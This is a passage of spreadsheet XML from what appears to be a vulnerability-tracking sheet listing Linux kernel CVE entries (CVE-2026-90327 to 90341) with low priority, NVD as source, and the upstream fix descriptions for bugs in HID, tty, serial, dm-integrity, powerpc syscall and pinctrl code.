blkcg_activate_policy() rollback and blkg destruction, ensuring pd
lifecycle is synchronized with blkg list visibility.</t>
        </is>
      </c>
      <c r="T694" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90326</t>
        </is>
      </c>
    </row>
    <row r="695">
      <c r="A695" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B695" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C695" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90327</t>
        </is>
      </c>
      <c r="D695" s="5" t="inlineStr"/>
      <c r="E695" s="5" t="inlineStr"/>
      <c r="F695" s="5" t="inlineStr"/>
      <c r="G695" s="5" t="inlineStr"/>
      <c r="H695" s="5" t="inlineStr"/>
      <c r="I695" s="5" t="inlineStr"/>
      <c r="J695" s="5" t="inlineStr"/>
      <c r="K695" s="5" t="inlineStr"/>
      <c r="L695" s="5" t="inlineStr"/>
      <c r="M695" s="5" t="inlineStr"/>
      <c r="N695" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O695" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P695" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q695" s="5" t="inlineStr"/>
      <c r="R695" s="5" t="inlineStr"/>
      <c r="S695" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
phonet: pep: do not write beyond optlen in getsockopt
pep_getsockopt() clamps the reported length to the caller's buffer with
min_t(), but then stores the value with put_user(val, (int __user *)
optval), which always writes sizeof(int) bytes. A getsockopt() call with
an optlen smaller than sizeof(int) thus reports the clamped length yet
writes a full int, one to three bytes past the user buffer.
Write the value with copy_to_user() bounded by len, so at most optlen
bytes are copied, matching the length reported back to userspace.</t>
        </is>
      </c>
      <c r="T695" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90327</t>
        </is>
      </c>
    </row>
    <row r="696">
      <c r="A696" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B696" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C696" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90328</t>
        </is>
      </c>
      <c r="D696" s="5" t="inlineStr"/>
      <c r="E696" s="5" t="inlineStr"/>
      <c r="F696" s="5" t="inlineStr"/>
      <c r="G696" s="5" t="inlineStr"/>
      <c r="H696" s="5" t="inlineStr"/>
      <c r="I696" s="5" t="inlineStr"/>
      <c r="J696" s="5" t="inlineStr"/>
      <c r="K696" s="5" t="inlineStr"/>
      <c r="L696" s="5" t="inlineStr"/>
      <c r="M696" s="5" t="inlineStr"/>
      <c r="N696" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O696" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P696" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q696" s="5" t="inlineStr"/>
      <c r="R696" s="5" t="inlineStr"/>
      <c r="S696" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: steam: Reject short reads
Steam Controller FEATURE reports encode the size of the message in the
message itself. Previously we were trusting that the size reported matched
the size we actually read, leading to a potential issue with short reads.
Instead, we should actually verify the length of the read.</t>
        </is>
      </c>
      <c r="T696" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90328</t>
        </is>
      </c>
    </row>
    <row r="697">
      <c r="A697" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B697" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C697" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90329</t>
        </is>
      </c>
      <c r="D697" s="5" t="inlineStr"/>
      <c r="E697" s="5" t="inlineStr"/>
      <c r="F697" s="5" t="inlineStr"/>
      <c r="G697" s="5" t="inlineStr"/>
      <c r="H697" s="5" t="inlineStr"/>
      <c r="I697" s="5" t="inlineStr"/>
      <c r="J697" s="5" t="inlineStr"/>
      <c r="K697" s="5" t="inlineStr"/>
      <c r="L697" s="5" t="inlineStr"/>
      <c r="M697" s="5" t="inlineStr"/>
      <c r="N697" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O697" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P697" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q697" s="5" t="inlineStr"/>
      <c r="R697" s="5" t="inlineStr"/>
      <c r="S697" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: synchronize input before cleaning up a failed probe
hid_device_io_start() allows reports to run concurrently with probe. If
the probe subsequently fails, __hid_device_probe() releases driver
resources and clears hdev-&gt;driver without first excluding those report
callbacks.
For example, a report may enter hidraw_report_event() while the failure
path frees the associated hidraw object, leading to a use-after-free when
the report takes the object's list lock.
Stop input before performing failed-probe cleanup. This reacquires
driver_input_lock and waits for any report callback already in progress.</t>
        </is>
      </c>
      <c r="T697" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90329</t>
        </is>
      </c>
    </row>
    <row r="698">
      <c r="A698" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B698" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C698" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90330</t>
        </is>
      </c>
      <c r="D698" s="5" t="inlineStr"/>
      <c r="E698" s="5" t="inlineStr"/>
      <c r="F698" s="5" t="inlineStr"/>
      <c r="G698" s="5" t="inlineStr"/>
      <c r="H698" s="5" t="inlineStr"/>
      <c r="I698" s="5" t="inlineStr"/>
      <c r="J698" s="5" t="inlineStr"/>
      <c r="K698" s="5" t="inlineStr"/>
      <c r="L698" s="5" t="inlineStr"/>
      <c r="M698" s="5" t="inlineStr"/>
      <c r="N698" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O698" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P698" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q698" s="5" t="inlineStr"/>
      <c r="R698" s="5" t="inlineStr"/>
      <c r="S698" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: logitech-hidpp: Fix FF device cleanup on init failure
hidpp_ff_init() creates the input force-feedback device with
input_ff_create(), then allocates the HID++ FF private data,
effect ID array, and workqueue.
If any of those allocations fail after input_ff_create() succeeds,
the function returns an error without destroying the FF device.
Add an unwind path that frees the private allocations made by
hidpp_ff_init() and calls input_ff_destroy() for failures after
input_ff_create() succeeds.</t>
        </is>
      </c>
      <c r="T698" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90330</t>
        </is>
      </c>
    </row>
    <row r="699">
      <c r="A699" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B699" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C699" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90331</t>
        </is>
      </c>
      <c r="D699" s="5" t="inlineStr"/>
      <c r="E699" s="5" t="inlineStr"/>
      <c r="F699" s="5" t="inlineStr"/>
      <c r="G699" s="5" t="inlineStr"/>
      <c r="H699" s="5" t="inlineStr"/>
      <c r="I699" s="5" t="inlineStr"/>
      <c r="J699" s="5" t="inlineStr"/>
      <c r="K699" s="5" t="inlineStr"/>
      <c r="L699" s="5" t="inlineStr"/>
      <c r="M699" s="5" t="inlineStr"/>
      <c r="N699" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O699" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P699" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q699" s="5" t="inlineStr"/>
      <c r="R699" s="5" t="inlineStr"/>
      <c r="S699" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
HID: asus: refactor the two workqueues and init sequence
Multiple issues have been found within the hid-asus driver:
- unchecked size in asus_raw_event()
- unclean teardown of asus_probe on failure
- possible use-after-free in asus_probe
- multiple workqueue used for jobs where one was enough
- sleeping calls in atomic context
- packets of incorrect size being sent to the keyboard controller
Join the two workqueues into one reusing the stopping mechanism
of the brightness workqueue, use the joined workqueue to also
move the asus_wmi_send_event() sleeping call away from atomic
context and add a size check in asus_raw_event().</t>
        </is>
      </c>
      <c r="T699" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90331</t>
        </is>
      </c>
    </row>
    <row r="700">
      <c r="A700" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B700" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C700" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90332</t>
        </is>
      </c>
      <c r="D700" s="5" t="inlineStr"/>
      <c r="E700" s="5" t="inlineStr"/>
      <c r="F700" s="5" t="inlineStr"/>
      <c r="G700" s="5" t="inlineStr"/>
      <c r="H700" s="5" t="inlineStr"/>
      <c r="I700" s="5" t="inlineStr"/>
      <c r="J700" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K700" s="5" t="inlineStr"/>
      <c r="L700" s="5" t="inlineStr"/>
      <c r="M700" s="5" t="inlineStr"/>
      <c r="N700" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O700" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P700" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q700" s="5" t="inlineStr"/>
      <c r="R700" s="5" t="inlineStr"/>
      <c r="S700" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
PCI: dwc: ep: Flush cached MSI write before unmapping the iATU
The MSI-X path already flushes any posted MSI-X write before tearing down
its iATU mapping. That was added by commit c22533c66cca ("PCI: dwc: ep:
Flush MSI-X write before unmapping its ATU entry") to make sure the write
reaches the Root Complex before the outbound window that translates it
disappears.
The MSI path has the same problem but no equivalent flush. When the
Endpoint driver caches an MSI target address and later observes that the
Root Complex has changed it, dw_pcie_ep_raise_msi_irq() unmaps the existing
iATU entry and reprograms it for the new address. Between the last MSI
writel() and the unmap there may still be a posted write sitting in the
fabric, and unmapping the iATU entry can drop or misroute that write.
Fix this by reading back from the mapped MSI window before the unmap. The
readback drains any posted MSI writes through the same iATU entry that
mapped them, which is the same logic the MSI-X path uses.
[mani: commit log]</t>
        </is>
      </c>
      <c r="T700" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90332</t>
        </is>
      </c>
    </row>
    <row r="701">
      <c r="A701" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B701" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C701" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90333</t>
        </is>
      </c>
      <c r="D701" s="5" t="inlineStr"/>
      <c r="E701" s="5" t="inlineStr"/>
      <c r="F701" s="5" t="inlineStr"/>
      <c r="G701" s="5" t="inlineStr"/>
      <c r="H701" s="5" t="inlineStr"/>
      <c r="I701" s="5" t="inlineStr"/>
      <c r="J701" s="5" t="inlineStr"/>
      <c r="K701" s="5" t="inlineStr"/>
      <c r="L701" s="5" t="inlineStr"/>
      <c r="M701" s="5" t="inlineStr"/>
      <c r="N701" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O701" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P701" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q701" s="5" t="inlineStr"/>
      <c r="R701" s="5" t="inlineStr"/>
      <c r="S701" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dm-integrity: replace forgeable discard filler with a keyed sector marker
The discard-block check in dm_integrity_rw_tag() treats a stored tag
of all 0xf6 bytes (DISCARD_FILLER) as proof a block was discarded and
skips HMAC verification. allow_discards is only accepted in
dm-integrity's standalone mode. An attacker with raw write access to
the backing device, but without the integrity key, can stamp any block
with an all-0xf6 tag and have it served as authentic.
Add a new "allow_discards_keyed" target argument that marks discarded
blocks with a keyed checksum of (salt || sector) instead, computed by
integrity_discard_checksum().</t>
        </is>
      </c>
      <c r="T701" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90333</t>
        </is>
      </c>
    </row>
    <row r="702">
      <c r="A702" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B702" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C702" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90334</t>
        </is>
      </c>
      <c r="D702" s="5" t="inlineStr"/>
      <c r="E702" s="5" t="inlineStr"/>
      <c r="F702" s="5" t="inlineStr"/>
      <c r="G702" s="5" t="inlineStr"/>
      <c r="H702" s="5" t="inlineStr"/>
      <c r="I702" s="5" t="inlineStr"/>
      <c r="J702" s="5" t="inlineStr"/>
      <c r="K702" s="5" t="inlineStr"/>
      <c r="L702" s="5" t="inlineStr"/>
      <c r="M702" s="5" t="inlineStr"/>
      <c r="N702" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O702" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P702" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q702" s="5" t="inlineStr"/>
      <c r="R702" s="5" t="inlineStr"/>
      <c r="S702" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tty: clear cdev pointer after cdev_add() failure
tty_cdev_add() drops the cdev reference when cdev_add() fails, but
leaves driver-&gt;cdevs[index] pointing to freed memory.
tty_unregister_device() later passes that stale pointer to cdev_del(),
causing a use-after-free.
Clear the slot after dropping the reference.</t>
        </is>
      </c>
      <c r="T702" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90334</t>
        </is>
      </c>
    </row>
    <row r="703">
      <c r="A703" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B703" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C703" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90335</t>
        </is>
      </c>
      <c r="D703" s="5" t="inlineStr"/>
      <c r="E703" s="5" t="inlineStr"/>
      <c r="F703" s="5" t="inlineStr"/>
      <c r="G703" s="5" t="inlineStr"/>
      <c r="H703" s="5" t="inlineStr"/>
      <c r="I703" s="5" t="inlineStr"/>
      <c r="J703" s="5" t="inlineStr"/>
      <c r="K703" s="5" t="inlineStr"/>
      <c r="L703" s="5" t="inlineStr"/>
      <c r="M703" s="5" t="inlineStr"/>
      <c r="N703" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P703" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q703" s="5" t="inlineStr"/>
      <c r="R703" s="5" t="inlineStr"/>
      <c r="S703" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
tty: skip cdev_del() when no cdev is registered
TTY device registration can fail before a cdev is allocated.
Serial core keeps the port so setserial can still use it, and later
removal passes the NULL cdev slot to cdev_del(), causing a NULL-pointer
dereference.
Only delete the cdev when the slot is not NULL.</t>
        </is>
      </c>
      <c r="T703" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90335</t>
        </is>
      </c>
    </row>
    <row r="704">
      <c r="A704" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B704" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C704" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90336</t>
        </is>
      </c>
      <c r="D704" s="5" t="inlineStr"/>
      <c r="E704" s="5" t="inlineStr"/>
      <c r="F704" s="5" t="inlineStr"/>
      <c r="G704" s="5" t="inlineStr"/>
      <c r="H704" s="5" t="inlineStr"/>
      <c r="I704" s="5" t="inlineStr"/>
      <c r="J704" s="5" t="inlineStr"/>
      <c r="K704" s="5" t="inlineStr"/>
      <c r="L704" s="5" t="inlineStr"/>
      <c r="M704" s="5" t="inlineStr"/>
      <c r="N704" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O704" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P704" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q704" s="5" t="inlineStr"/>
      <c r="R704" s="5" t="inlineStr"/>
      <c r="S704" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: core: clear freed pointers on uart_register_driver() failure
uart_register_driver() leaves drv-&gt;state pointing to freed memory when
tty_alloc_driver() fails. If tty_register_driver() fails, drv-&gt;tty_driver
also retains a pointer after its reference is dropped.
Drivers that use drv-&gt;state as an "already registered" flag can then skip
registration on the next probe and pass the freed state to
uart_add_one_port().
This issue was found with failslab on QEMU's raspi1ap board by
failing registration and binding the PL011 port again.
Clear both pointers on their failure paths, as uart_unregister_driver()
already does.</t>
        </is>
      </c>
      <c r="T704" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90336</t>
        </is>
      </c>
    </row>
    <row r="705">
      <c r="A705" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B705" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C705" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90337</t>
        </is>
      </c>
      <c r="D705" s="5" t="inlineStr"/>
      <c r="E705" s="5" t="inlineStr"/>
      <c r="F705" s="5" t="inlineStr"/>
      <c r="G705" s="5" t="inlineStr"/>
      <c r="H705" s="5" t="inlineStr"/>
      <c r="I705" s="5" t="inlineStr"/>
      <c r="J705" s="5" t="inlineStr"/>
      <c r="K705" s="5" t="inlineStr"/>
      <c r="L705" s="5" t="inlineStr"/>
      <c r="M705" s="5" t="inlineStr"/>
      <c r="N705" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O705" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P705" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q705" s="5" t="inlineStr"/>
      <c r="R705" s="5" t="inlineStr"/>
      <c r="S705" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: core: do fallible allocations before the console can be registered
serial_core_add_one_port() allocates uport-&gt;tty_groups after
uart_configure_port(), which may register the console. If the allocation
fails, the driver unwinds the port while its console remains registered.
The earlier uport-&gt;name allocation has a related failure path that leaves
state-&gt;uart_port linked to a port being freed.
Failslab reproduced a NULL dereference in PL011 console output and a KASAN
use-after-free in i.MX console output after failed binds.
Allocate the name and tty_groups before linking the port and configuring
it. Reserve space for the optional driver attribute group because
config_port() may populate uport-&gt;attr_group during configuration.</t>
        </is>
      </c>
      <c r="T705" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90337</t>
        </is>
      </c>
    </row>
    <row r="706">
      <c r="A706" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B706" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C706" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90338</t>
        </is>
      </c>
      <c r="D706" s="5" t="inlineStr"/>
      <c r="E706" s="5" t="inlineStr"/>
      <c r="F706" s="5" t="inlineStr"/>
      <c r="G706" s="5" t="inlineStr"/>
      <c r="H706" s="5" t="inlineStr"/>
      <c r="I706" s="5" t="inlineStr"/>
      <c r="J706" s="5" t="inlineStr"/>
      <c r="K706" s="5" t="inlineStr"/>
      <c r="L706" s="5" t="inlineStr"/>
      <c r="M706" s="5" t="inlineStr"/>
      <c r="N706" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O706" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P706" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q706" s="5" t="inlineStr"/>
      <c r="R706" s="5" t="inlineStr"/>
      <c r="S706" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
serial: amba-pl011: keep console clock enabled for atomic writes
pl011_console_write_atomic() runs from nbcon atomic context, where
sleeping is not allowed. It calls clk_enable(), which takes the common-clk
enable_lock. Under PREEMPT_RT that is a sleeping lock:
clk_enable_lock() first tries spin_trylock_irqsave(), but on contention
falls back to spin_lock_irqsave(). Therefore, an atomic-context printk on
an RT kernel with a clk-backed pl011 can trip:
  BUG: sleeping function called from invalid context at spinlock_rt.c:48
    __might_resched from rt_spin_lock
    rt_spin_lock from clk_enable_lock
    clk_enable_lock from clk_enable
    clk_enable from pl011_console_write_atomic
    ... from vprintk_emit
This was found and reproduced on PREEMPT_RT. Arm32 and arm64 DT SoCs are
affected; arm64 SBSA/ACPI has no clk, so clk_enable(NULL) short-circuits
before the lock. In addition, write_atomic() may be invoked from NMI
context and is documented to avoid locking. Removing clk_enable() from
the callback also avoids a potentially unsafe NMI acquisition of the
common-clock enable_lock.
An nbcon atomic-capable console must be printable from any context, so
the clock cannot be gated between writes. Enable the clock while the
console is available for output: use clk_prepare_enable() in
pl011_console_setup(), release it via clk_disable_unprepare() in the
console .exit() callback, and drop the per-write clk_enable()/clk_disable()
pairs from write_atomic() and write_thread().
When printk suspends consoles, drop the reference after
uart_suspend_port() stops console access and restore it before
uart_resume_port() -- but only if suspend actually marked the port
suspended (a wake-capable tty stays running and must keep its clock), and
keep it when console_suspend_enabled is false so no_console_suspend works.
The active power cost of keeping the clock enabled is platform-dependent:
none where the UART clock is a fixed always-on oscillator, real where it
is a gateable clock branch, which then cannot be gated (nor possibly can
its parent clocks) while the console is available for output. When serial
core actually suspends the port, the reference is released so the clock
provider can gate the clock tree.</t>
        </is>
      </c>
      <c r="T706" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90338</t>
        </is>
      </c>
    </row>
    <row r="707">
      <c r="A707" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B707" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C707" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90339</t>
        </is>
      </c>
      <c r="D707" s="5" t="inlineStr"/>
      <c r="E707" s="5" t="inlineStr"/>
      <c r="F707" s="5" t="inlineStr"/>
      <c r="G707" s="5" t="inlineStr"/>
      <c r="H707" s="5" t="inlineStr"/>
      <c r="I707" s="5" t="inlineStr"/>
      <c r="J707" s="5" t="inlineStr"/>
      <c r="K707" s="5" t="inlineStr"/>
      <c r="L707" s="5" t="inlineStr"/>
      <c r="M707" s="5" t="inlineStr"/>
      <c r="N707" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O707" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P707" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q707" s="5" t="inlineStr"/>
      <c r="R707" s="5" t="inlineStr"/>
      <c r="S707" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
powerpc/syscall: Fix syscall skip handling for seccomp and ptrace
After enabling GENERIC_ENTRY on PowerPC, syscall_enter_from_user_mode()
returns -1 as a sentinel to signal that seccomp or ptrace has intercepted
the syscall and already set a return value via syscall_set_return_value().
system_call_exception() was not handling this sentinel, and since -1UL
is &gt;= NR_syscalls, the code fell into the out-of-range path and returned
-ENOSYS, overwriting the errno already placed in regs-&gt;gpr[3].
The naive fix of checking r0 == -1L before the NR_syscalls bounds check
is ambiguous: a user legitimately calling syscall(-1) also produces r0 ==
-1L, and a tracer intercepting such a call would have its injected return
value silently discarded.
Fix this by introducing a thread flag that is set whenever
syscall_set_return_value() explicitly updates the return value. In
system_call_exception(), check and clear this flag before dispatching
the syscall, and return the preset value directly when it is present.
This ensures that an explicitly supplied return value always suppresses
syscall execution, regardless of the syscall number.
This handles all seccomp actions correctly:
  - SECCOMP_RET_ERRNO, SECCOMP_RET_TRACE (no tracer), SECCOMP_RET_USER_NOTIF:
    all call syscall_set_return_value(), flag is set, injected value returned.
  - SECCOMP_RET_TRAP, SECCOMP_RET_KILL: call syscall_rollback() and deliver
    a signal; flag is not set, but the process is dying so the return value
    is irrelevant.
The fix covers both ppc32 and ppc64 with no #ifdefs.</t>
        </is>
      </c>
      <c r="T707" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90339</t>
        </is>
      </c>
    </row>
    <row r="708">
      <c r="A708" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B708" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C708" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90340</t>
        </is>
      </c>
      <c r="D708" s="5" t="inlineStr"/>
      <c r="E708" s="5" t="inlineStr"/>
      <c r="F708" s="5" t="inlineStr"/>
      <c r="G708" s="5" t="inlineStr"/>
      <c r="H708" s="5" t="inlineStr"/>
      <c r="I708" s="5" t="inlineStr"/>
      <c r="J708" s="5" t="inlineStr"/>
      <c r="K708" s="5" t="inlineStr"/>
      <c r="L708" s="5" t="inlineStr"/>
      <c r="M708" s="5" t="inlineStr"/>
      <c r="N708" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O708" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P708" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q708" s="5" t="inlineStr"/>
      <c r="R708" s="5" t="inlineStr"/>
      <c r="S708" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
pinctrl: generic: free maps on pinctrl_generic_to_map() failure
pinctrl_generic_to_map() parses DT configuration and allocates pinctrl
maps via pinctrl_utils_reserve_map().
If subsequent steps (such as pinctrl_utils_add_map_mux(),
pinctrl_generic_add_group(), pinconf_generic_parse_dt_config(), or
pinctrl_utils_add_map_configs()) return an error, *maps may contain
partially allocated map entries. Returning the error directly without
freeing *maps leaks the allocated mapping memory across all drivers
that rely on pinctrl_generic_to_map().
Fix this by calling pinctrl_utils_free_map() and resetting *maps,
*num_maps, and *num_reserved_maps in the error path of
pinctrl_generic_to_map().</t>
        </is>
      </c>
      <c r="T708" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90340</t>
        </is>
      </c>
    </row>
    <row r="709">
      <c r="A709" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B709" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C709" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90341</t>
        </is>
      </c>
      <c r="D709" s="5" t="inlineStr"/>
      <c r="E709" s="5" t="inlineStr"/>
      <c r="F709" s="5" t="inlineStr"/>
      <c r="G709" s="5" t="inlineStr"/>
      <c r="H709" s="5" t="inlineStr"/>
      <c r="I709" s="5" t="inlineStr"/>
      <c r="J709" s="5" t="inlineStr"/>
      <c r="K709" s="5" t="inlineStr"/>
      <c r="L709" s="5" t="inlineStr"/>
      <c r="M709" s="5" t="inlineStr"/>
      <c r="N709" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O709" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P709" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q709" s="5" t="inlineStr"/>
      <c r="R709" s="5" t="inlineStr"/>
      <c r="S709" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
firmware: coreboot: Validate table bounds
